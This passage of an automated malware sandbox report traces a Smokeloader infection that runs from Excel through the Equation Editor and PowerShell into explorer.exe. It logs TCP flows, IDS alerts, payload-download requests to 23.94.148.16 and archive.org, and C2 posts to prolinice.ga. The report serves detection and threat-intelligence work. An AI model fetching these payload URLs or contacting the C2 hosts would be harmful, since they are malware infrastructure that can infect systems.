            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170

            Networking

            Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.22:49173 -> 185.251.91.119:80
            Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.22:49174 -> 185.251.91.119:80
            Source: Network traffic | Suricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.232.154:443 -> 192.168.2.22:49171
            Source: C:\Windows\SysWOW64\explorer.exe | Network Connect: 185.251.91.119 80
            Source: C:\Windows\SysWOW64\explorer.exe | Domain query: prolinice.ga
            Source: Malware configuration extractor | URLs: http://prolinice.ga/index.php
            Source: Malware configuration extractor | URLs: http://vilendar.ga/index.php
            Source: global traffic | HTTP traffic detected: GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1
                Host: ia803104.us.archive.org
                Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /90/WEFV.txt HTTP/1.1
                Host: 23.94.148.16
                Connection: Keep-Alive
            Source: Joe Sandbox View | IP Address: 207.241.232.154
            Source: Joe Sandbox View | ASN Name: INTERNET-ARCHIVEUS
            Source: Joe Sandbox View | ASN Name: AS-CMNUS
            Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS
            Source: Joe Sandbox View | ASN Name: SPRINTHOSTRU
            Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
            Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
            Source: Network traffic | Suricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 185.251.91.119:80 -> 192.168.2.22:49173
            Source: global traffic | HTTP traffic detected: GET /udMVqm HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: crash.sh
                Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /90/gn/inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday.doc HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 23.94.148.16
                Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /90/verynicebuttersmoothcakeicream.tIF HTTP/1.1
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 23.94.148.16
                Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                Accept: */*
                Referer: http://wrbvhkkkwfg.com/
                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                Content-Length: 275
                Host: prolinice.ga
            Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                Accept: */*
                Referer: http://prolinice.ga/
                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                Content-Length: 1395
                Host: prolinice.ga
            Source: unknown | HTTPS traffic detected: 208.64.171.230:443 -> 192.168.2.22:49164 version: TLS 1.0
            Source: unknown | HTTPS traffic detected: 208.64.171.230:443 -> 192.168.2.22:49165 version: TLS 1.0
            Source: unknown | HTTPS traffic detected: 208.64.171.230:443 -> 192.168.2.22:49166 version: TLS 1.0
            Source: unknown | HTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49171 version: TLS 1.0
            Source: unknown | TCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2CF5F506.emf
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: global traffic | DNS traffic detected: DNS query: crash.sh
            Source: global traffic | DNS traffic detected: DNS query: ia803104.us.archive.org
            Source: global traffic | DNS traffic detected: DNS query: prolinice.ga
            Source: unknown | HTTP traffic detected: POST /index.php HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                Accept: */*
                Referer: http://wrbvhkkkwfg.com/
                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                Content-Length: 275
                Host: prolinice.ga
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Sat, 31 Aug 2024 13:51:11 GMT
                Content-Type: text/html; charset=utf-8
                Content-Length: 144
                Connection: close
                X-DNS-Prefetch-Control: off
                X-Frame-Options: SAMEORIGIN
                Strict-Transport-Security: max-age=15552000; includeSubDomains
                X-Download-Options: noopen
                X-Content-Type-Options: nosniff
                X-XSS-Protection: 1; mode=block
                Content-Security-Policy: default-src 'none'
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Sat, 31 Aug 2024 13:51:12 GMT
                Content-Type: text/html; charset=utf-8
                Content-Length: 144
                Connection: close
                X-DNS-Prefetch-Control: off
                X-Frame-Options: SAMEORIGIN
                Strict-Transport-Security: max-age=15552000; includeSubDomains
                X-Download-Options: noopen
                X-Content-Type-Options: nosniff
                X-XSS-Protection: 1; mode=block
                Content-Security-Policy: default-src 'none'
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                date: Sat, 31 Aug 2024 13:51:45 GMT
                server: Apache/2.4.59 (Debian)
                transfer-encoding: chunked
                content-type: text/html; charset=utf-8
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                date: Sat, 31 Aug 2024 13:51:50 GMT
                server: Apache/2.4.59 (Debian)
                content-length: 409
                content-type: text/html; charset=utf-8
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>
            Source: powershell.exe, 0000000D.00000002.453954500.000000000243A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.94.148.16
            Source: powershell.exe, 0000000D.00000002.453954500.000000000243A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.94.148.16/90/WEFV.txt
            Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000009.00000002.438240089.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.438240089.00000000005E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIF
            Source: EQNEDT32.EXE, 00000009.00000002.438240089.00000000005FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIFj
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: explorer.exe, 0000000F.00000000.464570167.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.624600710.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
            Source: powershell.exe, 0000000D.00000002.454453172.0000000003209000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: explorer.exe, 00000013.00000002.514628656.00000000003C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/
            Source: explorer.exe, 00000013.00000002.514628656.00000000003C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0
            Source: explorer.exe, 0000000F.00000002.625742820.0000000003EE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.514628656.00000000003C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.514628656.0000000000394000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.507625773.00000000001EE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.510291767.0000000000644000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.624681421.0000000000474000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.624657376.00000000002CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.624815942.0000000000594000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000002.624601316.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.624734588.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.624623660.000000000015E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/index.php
            Source: explorer.exe, 00000013.00000002.514628656.0000000000394000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.507625773.00000000001EE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.510291767.0000000000644000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.624681421.0000000000474000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.624657376.00000000002CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.624815942.0000000000594000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000002.624601316.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.624734588.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.624623660.000000000015E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/index.phpMozilla/5.0
            Source: explorer.exe, 00000013.00000002.514628656.00000000003C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/ndex.php
            Source: powershell.exe, 0000000B.00000002.457563315.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.453954500.00000000021E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 0000000F.00000002.626188065.0000000007B6D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://wrbvhkkkwfg.com/
            Source: explorer.exe, 0000000F.00000002.626188065.0000000007B6D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://wrbvhkkkwfg.com/application/x-www-form-urlencodedMozilla/5.0
            Source: explorer.exe, 0000000F.00000000.464570167.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.624600710.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: explorer.exe, 0000000F.00000000.464950376.0000000003B98000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com0
            Source: explorer.exe, 0000000F.00000000.465313986.0000000007B42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.464803412.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.626188065.0000000007B42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.626188065.0000000007AA6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.465011761.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.625357590.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.625742820.0000000003DB1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
            Source: explorer.exe, 0000000F.00000000.465313986.0000000007B42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.464803412.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.626188065.0000000007B42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.626188065.0000000007AA6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.465011761.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.625357590.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.625742820.0000000003DB1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
            Source: explorer.exe, 0000000F.00000000.464803412.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.625357590.000000000260D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerxe
            Source: explorer.exe, 00000013.00000003.511484280.00000000003D8000.00000004.00000020.00020000.00000000.sdmp, 7947.tmp.19.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: explorer.exe, 00000013.00000003.511484280.00000000003D8000.00000004.00000020.00020000.00000000.sdmp, 7947.tmp.19.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
